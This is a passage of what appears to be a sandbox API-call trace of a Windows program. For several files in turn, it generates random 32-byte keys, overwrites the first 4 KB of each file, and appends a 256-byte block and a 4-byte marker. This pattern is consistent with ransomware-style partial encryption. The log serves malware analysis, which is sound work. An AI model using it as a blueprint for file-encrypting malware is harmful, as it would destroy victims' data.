RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0081.835] GetProcessHeap () returned 0x4f10000 [0081.835] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.835] GetProcessHeap () returned 0x4f10000 [0081.835] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0081.835] GetProcessHeap () returned 0x4f10000 [0081.835] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0081.835] GetProcessHeap () returned 0x4f10000 [0081.835] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0081.835] GetProcessHeap () returned 0x4f10000 [0081.835] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0081.835] GetProcessHeap () returned 0x4f10000 [0081.835] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0081.835] GetProcessHeap () returned 0x4f10000 [0081.835] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0081.835] GetProcessHeap () returned 0x4f10000 [0081.835] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.835] GetProcessHeap () returned 0x4f10000 [0081.835] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0081.835] GetProcessHeap () returned 0x4f10000 [0081.835] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.835] GetProcessHeap () returned 0x4f10000 [0081.835] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.835] GetProcessHeap () returned 0x4f10000 [0081.835] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.835] GetProcessHeap () returned 0x4f10000 [0081.835] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.835] GetProcessHeap () returned 0x4f10000 [0081.835] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.835] GetProcessHeap () returned 0x4f10000 [0081.835] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.835] GetProcessHeap () returned 0x4f10000 [0081.835] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.836] GetProcessHeap () returned 0x4f10000 [0081.836] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.836] GetProcessHeap () returned 0x4f10000 [0081.836] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.836] GetProcessHeap () returned 0x4f10000 [0081.836] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.836] GetProcessHeap () returned 0x4f10000 [0081.836] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.836] GetProcessHeap () returned 0x4f10000 [0081.836] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.836] GetProcessHeap () returned 0x4f10000 [0081.836] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.836] GetProcessHeap () returned 0x4f10000 [0081.836] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.836] GetProcessHeap () returned 0x4f10000 [0081.836] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.836] GetProcessHeap () returned 0x4f10000 [0081.836] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.836] GetProcessHeap () returned 0x4f10000 [0081.836] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.836] GetProcessHeap () returned 0x4f10000 [0081.836] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.836] GetProcessHeap () returned 0x4f10000 [0081.836] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.836] GetProcessHeap () returned 0x4f10000 [0081.836] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.836] GetProcessHeap () returned 0x4f10000 [0081.836] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.836] GetProcessHeap () returned 0x4f10000 [0081.837] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.837] GetProcessHeap () returned 0x4f10000 [0081.837] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.837] GetProcessHeap () returned 0x4f10000 [0081.837] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.837] GetProcessHeap () returned 0x4f10000 [0081.837] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0081.837] GetProcessHeap () returned 0x4f10000 [0081.837] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.837] GetProcessHeap () returned 0x4f10000 [0081.837] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0081.837] GetProcessHeap () returned 0x4f10000 [0081.837] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0081.837] GetProcessHeap () returned 0x4f10000 [0081.837] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0081.837] GetProcessHeap () returned 0x4f10000 [0081.837] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0081.837] SetFilePointerEx (in: hFile=0x89c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.837] WriteFile (in: hFile=0x89c, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0081.837] WriteFile (in: hFile=0x89c, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0081.837] GetProcessHeap () returned 0x4f10000 [0081.837] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0081.837] GetProcessHeap () returned 0x4f10000 [0081.837] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0081.837] GetProcessHeap () returned 0x4f10000 [0081.837] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0081.837] CloseHandle (hObject=0x89c) returned 1 [0081.839] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 72 [0081.839] SetFilePointerEx (in: hFile=0x8a0, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.839] ReadFile (in: hFile=0x8a0, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0081.839] SetFilePointerEx (in: hFile=0x8a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.839] GetProcessHeap () returned 0x4f10000 [0081.839] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0081.839] GetProcessHeap () returned 0x4f10000 [0081.839] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0081.839] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0081.839] GetProcessHeap () returned 0x4f10000 [0081.839] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0081.839] ReadFile (in: hFile=0x8a0, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0081.887] SetFilePointerEx (in: hFile=0x8a0, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.887] WriteFile (in: hFile=0x8a0, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0081.887] GetProcessHeap () returned 0x4f10000 [0081.887] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0081.887] GetProcessHeap () returned 0x4f10000 [0081.887] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.887] GetProcessHeap () returned 0x4f10000 [0081.887] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0081.887] GetProcessHeap () returned 0x4f10000 [0081.887] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.887] GetProcessHeap () returned 0x4f10000 [0081.887] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0081.888] GetProcessHeap () returned 0x4f10000 [0081.888] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.888] GetProcessHeap () returned 0x4f10000 [0081.888] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.888] GetProcessHeap () returned 0x4f10000 [0081.888] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.888] GetProcessHeap () returned 0x4f10000 [0081.888] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.888] GetProcessHeap () returned 0x4f10000 [0081.888] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.888] GetProcessHeap () returned 0x4f10000 [0081.888] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.888] GetProcessHeap () returned 0x4f10000 [0081.888] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.888] GetProcessHeap () returned 0x4f10000 [0081.888] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.888] GetProcessHeap () returned 0x4f10000 [0081.888] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.888] GetProcessHeap () returned 0x4f10000 [0081.888] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.888] GetProcessHeap () returned 0x4f10000 [0081.888] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.888] GetProcessHeap () returned 0x4f10000 [0081.888] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.888] GetProcessHeap () returned 0x4f10000 [0081.888] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.888] GetProcessHeap () returned 0x4f10000 [0081.888] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.888] GetProcessHeap () returned 0x4f10000 [0081.888] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.888] GetProcessHeap () returned 0x4f10000 [0081.888] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.888] GetProcessHeap () returned 0x4f10000 [0081.888] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.888] GetProcessHeap () returned 0x4f10000 [0081.888] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.888] GetProcessHeap () returned 0x4f10000 [0081.888] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.889] GetProcessHeap () returned 0x4f10000 [0081.889] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.889] GetProcessHeap () returned 0x4f10000 [0081.889] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.889] GetProcessHeap () returned 0x4f10000 [0081.889] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.889] GetProcessHeap () returned 0x4f10000 [0081.889] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.889] GetProcessHeap () returned 0x4f10000 [0081.889] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.889] GetProcessHeap () returned 0x4f10000 [0081.889] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.889] GetProcessHeap () returned 0x4f10000 [0081.889] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.889] GetProcessHeap () returned 0x4f10000 [0081.889] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.889] GetProcessHeap () returned 0x4f10000 [0081.889] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.889] GetProcessHeap () returned 0x4f10000 [0081.889] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.889] GetProcessHeap () returned 0x4f10000 [0081.889] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.889] GetProcessHeap () returned 0x4f10000 [0081.889] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.889] GetProcessHeap () returned 0x4f10000 [0081.889] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.889] GetProcessHeap () returned 0x4f10000 [0081.889] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.889] GetProcessHeap () returned 0x4f10000 [0081.889] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0081.889] GetProcessHeap () returned 0x4f10000 [0081.889] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.889] GetProcessHeap () returned 0x4f10000 [0081.890] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0081.890] GetProcessHeap () returned 0x4f10000 [0081.890] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0081.890] GetProcessHeap () returned 0x4f10000 [0081.890] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0081.890] GetProcessHeap () returned 0x4f10000 [0081.890] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0081.890] GetProcessHeap () returned 0x4f10000 [0081.890] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0081.890] GetProcessHeap () returned 0x4f10000 [0081.890] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0081.890] GetProcessHeap () returned 0x4f10000 [0081.890] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.890] GetProcessHeap () returned 0x4f10000 [0081.890] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0081.890] GetProcessHeap () returned 0x4f10000 [0081.890] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.890] GetProcessHeap () returned 0x4f10000 [0081.890] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.890] GetProcessHeap () returned 0x4f10000 [0081.890] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.890] GetProcessHeap () returned 0x4f10000 [0081.890] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.890] GetProcessHeap () returned 0x4f10000 [0081.890] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.890] GetProcessHeap () returned 0x4f10000 [0081.890] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.890] GetProcessHeap () returned 0x4f10000 [0081.890] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.890] GetProcessHeap () returned 0x4f10000 [0081.890] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.891] GetProcessHeap () returned 0x4f10000 [0081.891] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.891] GetProcessHeap () returned 0x4f10000 [0081.891] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.891] GetProcessHeap () returned 0x4f10000 [0081.891] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.891] GetProcessHeap () returned 0x4f10000 [0081.891] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.891] GetProcessHeap () returned 0x4f10000 [0081.891] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.891] GetProcessHeap () returned 0x4f10000 [0081.891] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.891] GetProcessHeap () returned 0x4f10000 [0081.891] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.891] GetProcessHeap () returned 0x4f10000 [0081.891] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.891] GetProcessHeap () returned 0x4f10000 [0081.891] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.891] GetProcessHeap () returned 0x4f10000 [0081.891] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.891] GetProcessHeap () returned 0x4f10000 [0081.891] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.891] GetProcessHeap () returned 0x4f10000 [0081.891] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.891] GetProcessHeap () returned 0x4f10000 [0081.891] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.891] GetProcessHeap () returned 0x4f10000 [0081.891] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.892] GetProcessHeap () returned 0x4f10000 [0081.892] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.892] GetProcessHeap () returned 0x4f10000 [0081.892] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.892] GetProcessHeap () returned 0x4f10000 [0081.892] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0081.892] GetProcessHeap () returned 0x4f10000 [0081.892] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.892] GetProcessHeap () returned 0x4f10000 [0081.892] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0081.892] GetProcessHeap () returned 0x4f10000 [0081.892] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0081.892] GetProcessHeap () returned 0x4f10000 [0081.892] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0081.892] GetProcessHeap () returned 0x4f10000 [0081.892] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0081.892] SetFilePointerEx (in: hFile=0x8a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.892] WriteFile (in: hFile=0x8a0, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0081.892] WriteFile (in: hFile=0x8a0, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0081.892] GetProcessHeap () returned 0x4f10000 [0081.893] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0081.893] GetProcessHeap () returned 0x4f10000 [0081.893] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0081.893] GetProcessHeap () returned 0x4f10000 [0081.893] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0081.893] CloseHandle (hObject=0x8a0) returned 1 [0081.894] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 73 [0081.894] SetFilePointerEx (in: hFile=0x8a4, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.895] ReadFile (in: hFile=0x8a4, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0081.895] SetFilePointerEx (in: hFile=0x8a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.895] GetProcessHeap () returned 0x4f10000 [0081.895] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0081.895] GetProcessHeap () returned 0x4f10000 [0081.895] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0081.895] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0081.895] GetProcessHeap () returned 0x4f10000 [0081.895] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0081.895] ReadFile (in: hFile=0x8a4, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0081.943] SetFilePointerEx (in: hFile=0x8a4, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.943] WriteFile (in: hFile=0x8a4, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0081.943] GetProcessHeap () returned 0x4f10000 [0081.943] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0081.943] GetProcessHeap () returned 0x4f10000 [0081.943] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.943] GetProcessHeap () returned 0x4f10000 [0081.943] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0081.943] GetProcessHeap () returned 0x4f10000 [0081.943] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.943] GetProcessHeap () returned 0x4f10000 [0081.943] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0081.943] GetProcessHeap () returned 0x4f10000 [0081.943] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.943] GetProcessHeap () returned 0x4f10000 [0081.943] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.943] GetProcessHeap () returned 0x4f10000 [0081.943] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.943] GetProcessHeap () returned 0x4f10000 [0081.943] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.943] GetProcessHeap () returned 0x4f10000 [0081.943] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.943] GetProcessHeap () returned 0x4f10000 [0081.943] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.943] GetProcessHeap () returned 0x4f10000 [0081.944] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.944] 